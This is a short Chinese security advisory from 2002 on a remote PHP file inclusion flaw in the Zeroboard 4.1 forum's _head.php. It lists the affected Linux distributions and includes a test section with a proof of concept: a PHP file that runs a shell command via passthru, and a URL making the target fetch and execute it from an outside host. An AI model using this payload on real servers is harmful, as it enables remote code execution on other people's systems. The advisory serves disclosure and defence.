|
|
Zeroboard PHP包含文件任意命令执行漏洞
发布时间:2002-06-19
更新时间:2002-06-19
严重程度:高
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:5028
受影响系统Zeroboard Zeroboard 4.1 pl2
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 alpha
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- RedHat Linux 7.3 i386
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 x86
- S.u.S.E. Linux 7.2 i386
- S.u.S.E. Linux 7.3 i386
- S.u.S.E. Linux 7.3 ppc
- S.u.S.E. Linux 7.3 sparc
- S.u.S.E. Linux 8.0 i386 详细描述
Zeroboard是使用在多种系统下的PHP WEB论坛程序。
在某些情况下,允许包含任意PHP文件,_head.php对输入没有正确过滤,当Php.ini文件设置了"allow_url_fopen"变量和"register_globals"变量为"on"时,就可以通过_head.php脚本从远程URL装载PHP包含文件,如果文件中包含PHP代码可导致任意代码执行。
测试代码
PHP Source file a.php
<? passthru("/bin/ls"); ?>
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a
解决方案
尚无
相关信息
I'm I <onlooker@cnun.xsdeny.net>.
参考:http://online.securityfocus.com/archive/1/277126
相关主页:http://www.zeroboard.com/
|
